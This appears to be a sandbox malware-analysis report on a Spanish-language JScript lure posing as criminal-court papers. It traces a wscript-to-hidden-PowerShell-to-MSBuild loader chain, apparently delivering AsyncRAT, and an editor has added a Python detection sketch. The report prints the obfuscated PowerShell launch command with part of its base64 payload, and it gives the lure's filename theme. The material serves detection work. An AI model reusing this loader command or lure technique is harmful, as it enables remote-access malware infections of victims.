              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3rbvho3.eoz.ps1Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).jsVirustotal: Detection: 31%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js"
               Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '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
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js"
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
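The "Process created" lines above are the whole loader chain: wscript.exe running the .js lure, powershell.exe launched with -nop -w hidden -c and an inline base64 blob, cmd.exe copying the script into C:\Users\Public\Downloads\fluctuous.js as a staging copy, and MSBuild.exe started with no project file at all, which is the process that later creates the AsyncMutex_6SI8OkPnk mutant listed earlier. The Python below is an added detection sketch by the editor, not a Joe Sandbox signature or a Sigma rule from this report. It runs over constructed Sysmon-style process-creation records that mirror this chain (PIDs invented, command lines taken from the page, the base64 argument shortened) and includes a benign MSBuild build from an interactive cmd.exe to show that the ancestry check keeps ordinary developer builds quiet.

```python
"""Added detection sketch (not a Joe Sandbox or Sigma rule from this
report): flag the wscript -> powershell -> cmd/MSBuild loader chain
over Sysmon-style process-creation records."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
PS_NOPROFILE = re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.I)
PS_HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
PS_INLINE = re.compile(r"(?:^|\s)-(?:c|command|e|ec|enc|encodedcommand)\b", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")   # long base64 run in the command line
PROJECT_ARG = re.compile(r"\.(?:csproj|vbproj|proj|sln|targets)\b", re.I)
PUBLIC_COPY = re.compile(r"\bcopy\b.*\\users\\public\\", re.I)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image names from pid up to the root, following ppid links."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    """Return (pid, rule) pairs, in event order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        pname = image_name(parent.image) if parent else ""
        if name == "powershell.exe":
            if pname in SCRIPT_HOSTS:
                findings.append((e.pid, "script_host_spawns_powershell"))
            flag_hits = sum(bool(p.search(e.cmdline)) for p in (PS_NOPROFILE, PS_HIDDEN, PS_INLINE))
            if flag_hits >= 2 and B64_BLOB.search(e.cmdline):
                findings.append((e.pid, "hidden_powershell_inline_base64"))
        elif name == "msbuild.exe" and not PROJECT_ARG.search(e.cmdline):
            # MSBuild with no project file is a common injection host, but
            # developers run it that way too: require a script-host ancestor
            # with powershell.exe in between before raising it.
            chain = ancestry(events, e.pid)
            if "powershell.exe" in chain and SCRIPT_HOSTS & set(chain):
                findings.append((e.pid, "msbuild_no_project_from_script_chain"))
        elif name == "cmd.exe" and PUBLIC_COPY.search(e.cmdline):
            findings.append((e.pid, "script_copied_to_users_public"))
    return findings


# Constructed records mirroring this report's process tree (PIDs invented,
# command lines from the page, base64 argument shortened).  The last two
# are a benign control: an interactive developer build must stay quiet.
B64_START = ("JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYA"
             "ZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIA"
             "MQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgA")
SAMPLE_EVENTS = [
    ProcEvent(4100, 1, r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js"'),
    ProcEvent(4200, 4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = ' + "'" + B64_START + "'"),
    ProcEvent(4300, 4200, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js"'),
    ProcEvent(4400, 4200, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"'),
    ProcEvent(5000, 1, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(5100, 5000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe"),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

Each rule alone is noisy (administrators run hidden PowerShell, developers run bare MSBuild.exe); the value is in tying them to the same ancestry, which is why the MSBuild rule walks the parent chain instead of looking only at its immediate parent.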
               Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, scrrun.dll, mpr.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (listed twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (listed twice), windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, msasn1.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll (the Winsock, DNS and WFP client libraries in a build tool that was started with no project file are consistent with the AsyncRAT client running inside MSBuild.exe; compare the AsyncMutex_6SI8OkPnk mutant created by the same process above)
               Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
               Source: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js Static file information: File size 1477831 > 1048576
              Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `2microsoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheader source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
               Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
               Source: Binary string: `1dnlib.dotnet.writermodulewriteroptionsbasednlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.ioloaderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.d
              Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
               Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixups source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdb source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdbk= source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
               Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: CreateTextFile("Z:\syscalls\5357.js.csv");IWshShell3._00000000();ITextStream.WriteLine(" entry:398395 o: f:Run a0:%22powershell%20-nop%20-w%20hidden%20-c%20%22%24embolic%20%3D%20'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxAD");IWshShell3.Run("powershell -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0A", "0", "false")
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, Packet.cs .Net Code: Plugins System.AppDomain.Load(byte[])
